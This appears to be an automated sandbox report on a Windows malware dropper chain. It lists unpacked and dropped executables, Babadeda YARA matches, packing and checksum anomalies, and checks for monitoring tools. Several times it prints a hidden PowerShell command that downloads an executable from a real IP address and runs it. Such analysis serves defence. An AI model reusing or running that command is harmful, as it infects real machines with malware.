Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Unpacked PE file: 50.2.466a80d633.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gjftmkgg:EW;nznnravi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gjftmkgg:EW;nznnravi:EW;.taggant:EW;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 29.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 32.2.22.exe.400000.0.unpack
Yara detected Babadeda
Source: Yara match File source: 28.3.apple.exe.270a7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\22.exe, type: DROPPED
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
File is packed with WinRar
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6573468
PE file contains an invalid checksum
Source: d6a397c01b.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x120e1d
Source: rapes.exe.10.dr Static PE information: real checksum: 0x1e41b1 should be: 0x1e6f9b
Source: amnew[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x724e5
Source: gron12321[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0x12c845
Source: crypted.54[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0x1361e9
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: real checksum: 0x1e41b1 should be: 0x1e6f9b
Source: EPTwCQd.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x17197c
Source: 7b35p_003.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x13e9c7
Source: 466a80d633.exe.21.dr Static PE information: real checksum: 0x485455 should be: 0x477b15
Source: q4jfn3p[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x144494
Source: EPTwCQd[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x17197c
Source: random[1].exe.21.dr Static PE information: real checksum: 0x4698cc should be: 0x4662af
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0x121aba
Source: random[1].exe1.21.dr Static PE information: real checksum: 0x485455 should be: 0x477b15
Source: crypted.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x1361e9
Source: v7942.exe.43.dr Static PE information: real checksum: 0x0 should be: 0xfa419
Source: f4d01cf3f8.exe.43.dr Static PE information: real checksum: 0x4698cc should be: 0x4662af
Source: q4jfn3p.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x144494
Source: 22.exe.28.dr Static PE information: real checksum: 0x0 should be: 0x1e9f1
Source: please18[1].43.dr Static PE information: real checksum: 0x0 should be: 0x69451
Source: amnew.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x724e5
Source: 7b35p_003[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x13e9c7
Source: please18.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x69451
Source: apple[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x52234
Source: v7942[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0xfa419
Source: random[1].exe0.21.dr Static PE information: real checksum: 0x0 should be: 0x120e1d
Source: alex1dskfmdsf.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x121aba
Source: futors.exe.41.dr Static PE information: real checksum: 0x0 should be: 0x724e5
Source: EPTwCQd.exe0.21.dr Static PE information: real checksum: 0x0 should be: 0x17197c
Source: apple.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x52234
Source: 466f8e521c.exe.21.dr Static PE information: real checksum: 0x4698cc should be: 0x4662af
Source: 01ea7855d3.exe.43.dr Static PE information: real checksum: 0x485455 should be: 0x477b15
Source: gron12321.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x12c845
PE file contains sections with non-standard names
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: .idata
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: gvjtyabe
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: ztcjzytj
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: .taggant
Source: rapes.exe.10.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name: .idata
Source: rapes.exe.10.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name: gvjtyabe
Source: rapes.exe.10.dr Static PE information: section name: ztcjzytj
Source: rapes.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe.21.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name: .idata
Source: random[1].exe.21.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name: vcauzjku
Source: random[1].exe.21.dr Static PE information: section name: tulszghi
Source: random[1].exe.21.dr Static PE information: section name: .taggant
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name: .idata
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name: vcauzjku
Source: 466f8e521c.exe.21.dr Static PE information: section name: tulszghi
Source: 466f8e521c.exe.21.dr Static PE information: section name: .taggant
Source: random[1].exe0.21.dr Static PE information: section name: .gxfg
Source: random[1].exe0.21.dr Static PE information: section name: .retplne
Source: random[1].exe0.21.dr Static PE information: section name: _RDATA
Source: random[1].exe0.21.dr Static PE information: section name: .cSs
Source: random[1].exe0.21.dr Static PE information: section name: .cSs
Source: d6a397c01b.exe.21.dr Static PE information: section name: .gxfg
Source: d6a397c01b.exe.21.dr Static PE information: section name: .retplne
Source: d6a397c01b.exe.21.dr Static PE information: section name: _RDATA
Source: d6a397c01b.exe.21.dr Static PE information: section name: .cSs
Source: d6a397c01b.exe.21.dr Static PE information: section name: .cSs
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds0
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds1
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds2
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds0
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds1
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds2
Source: EPTwCQd.exe.21.dr Static PE information: section name: .gxfg
Source: EPTwCQd.exe.21.dr Static PE information: section name: .retplne
Source: EPTwCQd.exe.21.dr Static PE information: section name: _RDATA
Source: EPTwCQd.exe.21.dr Static PE information: section name: .cSs
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: .gxfg
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: .retplne
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: _RDATA
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: .cSs
Source: EPTwCQd.exe0.21.dr Static PE information: section name: .gxfg
Source: EPTwCQd.exe0.21.dr Static PE information: section name: .retplne
Source: EPTwCQd.exe0.21.dr Static PE information: section name: _RDATA
Source: EPTwCQd.exe0.21.dr Static PE information: section name: .cSs
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: .gxfg
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: .retplne
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: _RDATA
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: .cSs
Source: q4jfn3p.exe.21.dr Static PE information: section name: .gxfg
Source: q4jfn3p.exe.21.dr Static PE information: section name: .retplne
Source: q4jfn3p.exe.21.dr Static PE information: section name: _RDATA
Source: q4jfn3p.exe.21.dr Static PE information: section name: .cSs
Source: apple[1].exe.21.dr Static PE information: section name: .didat
Source: apple.exe.21.dr Static PE information: section name: .didat
Source: random[1].exe1.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name: .idata
Source: random[1].exe1.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name: gjftmkgg
Source: random[1].exe1.21.dr Static PE information: section name: nznnravi
Source: random[1].exe1.21.dr Static PE information: section name: .taggant
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name: .idata
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name: gjftmkgg
Source: 466a80d633.exe.21.dr Static PE information: section name: nznnravi
Source: 466a80d633.exe.21.dr Static PE information: section name: .taggant
Source: 22.exe.28.dr Static PE information: section name: .code
Source: crypted.54[1].exe.43.dr Static PE information: section name: .gxfg
Source: crypted.54[1].exe.43.dr Static PE information: section name: .retplne
Source: crypted.54[1].exe.43.dr Static PE information: section name: _RDATA
Source: crypted.54[1].exe.43.dr Static PE information: section name: .cSs
Source: crypted.exe.43.dr Static PE information: section name: .gxfg
Source: crypted.exe.43.dr Static PE information: section name: .retplne
Source: crypted.exe.43.dr Static PE information: section name: _RDATA
Source: crypted.exe.43.dr Static PE information: section name: .cSs
Source: v7942[1].exe.43.dr Static PE information: section name: .gxfg
Source: v7942[1].exe.43.dr Static PE information: section name: .retplne
Source: v7942[1].exe.43.dr Static PE information: section name: _RDATA
Source: v7942.exe.43.dr Static PE information: section name: .gxfg
Source: v7942.exe.43.dr Static PE information: section name: .retplne
Source: v7942.exe.43.dr Static PE information: section name: _RDATA
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: section name: .gxfg
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: section name: .retplne
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: section name: _RDATA
Source: alex1dskfmdsf.exe.43.dr Static PE information: section name: .gxfg
Source: alex1dskfmdsf.exe.43.dr Static PE information: section name: .retplne
Source: alex1dskfmdsf.exe.43.dr Static PE information: section name: _RDATA
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: .idata
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: vcauzjku
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: tulszghi
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: .taggant
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name: .idata
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name: gjftmkgg
Source: 01ea7855d3.exe.43.dr Static PE information: section name: nznnravi
Source: 01ea7855d3.exe.43.dr Static PE information: section name: .taggant
Source: gron12321[1].exe.43.dr Static PE information: section name: .gxfg
Source: gron12321[1].exe.43.dr Static PE information: section name: .retplne
Source: gron12321[1].exe.43.dr Static PE information: section name: _RDATA
Source: gron12321.exe.43.dr Static PE information: section name: .gxfg
Source: gron12321.exe.43.dr Static PE information: section name: .retplne
Source: gron12321.exe.43.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DFE953 push eax; iretd 0_2_00DFE958
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E00A76 push ecx; ret 0_2_00E00A89
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4164A pushad ; ret 0_2_00E4164B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF9C11A00BD pushad ; iretd 8_2_00007FF9C11A00C1
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: entropy: 7.973325401220018
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: gvjtyabe entropy: 7.954122802946133
Source: rapes.exe.10.dr Static PE information: section name: entropy: 7.973325401220018
Source: rapes.exe.10.dr Static PE information: section name: gvjtyabe entropy: 7.954122802946133
Source: random[1].exe.21.dr Static PE information: section name: entropy: 7.982738862956585
Source: random[1].exe.21.dr Static PE information: section name: vcauzjku entropy: 7.946267340234163
Source: 466f8e521c.exe.21.dr Static PE information: section name: entropy: 7.982738862956585
Source: 466f8e521c.exe.21.dr Static PE information: section name: vcauzjku entropy: 7.946267340234163
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds2 entropy: 7.990733002735885
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds2 entropy: 7.990733002735885
Source: random[1].exe1.21.dr Static PE information: section name: entropy: 7.984317462641947
Source: random[1].exe1.21.dr Static PE information: section name: gjftmkgg entropy: 7.9460606025010625
Source: 466a80d633.exe.21.dr Static PE information: section name: entropy: 7.984317462641947
Source: 466a80d633.exe.21.dr Static PE information: section name: gjftmkgg entropy: 7.9460606025010625
Source: please18.exe.43.dr Static PE information: section name: .text entropy: 7.1539318576021165
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: entropy: 7.982738862956585
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: vcauzjku entropy: 7.946267340234163
Source: 01ea7855d3.exe.43.dr Static PE information: section name: entropy: 7.984317462641947
Source: 01ea7855d3.exe.43.dr Static PE information: section name: gjftmkgg entropy: 7.9460606025010625
Source: please18[1].43.dr Static PE information: section name: .text entropy: 7.1539318576021165
Source: please18.exe.43.dr, k3F1Qt.cs High entropy of concatenated method names: 'Ai8d7C', 'q0C8Ei', 'a8G5Nq', 'Dg60Fn', 'p7LHx1', 'k4R6Kn', 'x1WCk9', 'j6E1Nc', 'e5F3Yd', 'k2GRn7'
Source: please18.exe.43.dr, Hk76Ky.cs High entropy of concatenated method names: 'e2A8Gnw', 'Nm70ZaP', 'w0J6MeQ', 'Mb5k1NS', 'Ef52JzH', 'Bt67Eqf', 'o3BGm0y', 'Fw2e1M3', 'r9W3Ktc', 'j2P6CkD'
Source: please18.exe.43.dr, j9LXn58.cs High entropy of concatenated method names: 'Zt28Nbi', 'd7L8WmQ', 'b6R3Zte', 'c5KSb08', 'Zw69Fce', 'y3JMw02', 'j2RKd50', 'Ls94NdK', 'q5CTg6y', 'Lp81Rdm'
Source: please18.exe.43.dr, We41Kg.cs High entropy of concatenated method names: 'Ff7e2A', 'Gd3s9D', 'a8KXm6', 'Em3k5G', 'k5Q9Eg', 's7R2Co', 'Ds0k6Q', 'Pq96Fg', 'm1G0Dr', 'w6W0Tz'
Source: please18.exe.43.dr, i9EZo8.cs High entropy of concatenated method names: 'Ey8z6A', 'f9P7Kn', 's6J5Zi', 'Se9x0L', 'q7L5Bi', 'f5E2Jg', 'Tc1x0B', 'c3CLq0', 'm6Z4Yf', 'Cz23Sq'
Source: please18.exe.43.dr, Cw53Jay.cs High entropy of concatenated method names: 'Zq1n9J3', 'x4D8QsR', 'o2ZTb8x', 'y2E0SnW', 'n4SWx15', 'Re9f6P5', 'Zg4n8W2', 'q0ZBg8b', 'y9BRc73', 'z7Q8Rrb'
Source: please18[1].43.dr, k3F1Qt.cs High entropy of concatenated method names: 'Ai8d7C', 'q0C8Ei', 'a8G5Nq', 'Dg60Fn', 'p7LHx1', 'k4R6Kn', 'x1WCk9', 'j6E1Nc', 'e5F3Yd', 'k2GRn7'
Source: please18[1].43.dr, Hk76Ky.cs High entropy of concatenated method names: 'e2A8Gnw', 'Nm70ZaP', 'w0J6MeQ', 'Mb5k1NS', 'Ef52JzH', 'Bt67Eqf', 'o3BGm0y', 'Fw2e1M3', 'r9W3Ktc', 'j2P6CkD'
Source: please18[1].43.dr, j9LXn58.cs High entropy of concatenated method names: 'Zt28Nbi', 'd7L8WmQ', 'b6R3Zte', 'c5KSb08', 'Zw69Fce', 'y3JMw02', 'j2RKd50', 'Ls94NdK', 'q5CTg6y', 'Lp81Rdm'
Source: please18[1].43.dr, We41Kg.cs High entropy of concatenated method names: 'Ff7e2A', 'Gd3s9D', 'a8KXm6', 'Em3k5G', 'k5Q9Eg', 's7R2Co', 'Ds0k6Q', 'Pq96Fg', 'm1G0Dr', 'w6W0Tz'
Source: please18[1].43.dr, i9EZo8.cs High entropy of concatenated method names: 'Ey8z6A', 'f9P7Kn', 's6J5Zi', 'Se9x0L', 'q7L5Bi', 'f5E2Jg', 'Tc1x0B', 'c3CLq0', 'm6Z4Yf', 'Cz23Sq'
Source: please18[1].43.dr, Cw53Jay.cs High entropy of concatenated method names: 'Zq1n9J3', 'x4D8QsR', 'o2ZTb8x', 'y2E0SnW', 'n4SWx15', 'Re9f6P5', 'Zg4n8W2', 'q0ZBg8b', 'y9BRc73', 'z7Q8Rrb'

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Tries to download and execute files (via powershell)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe File created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041880101\01ea7855d3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\EPTwCQd[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1] Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\q4jfn3p[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\apple[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\22.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\amnew[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File created: C:\Users\user\AppData\Local\Temp\svchost015.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1] Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass Jump to behavior
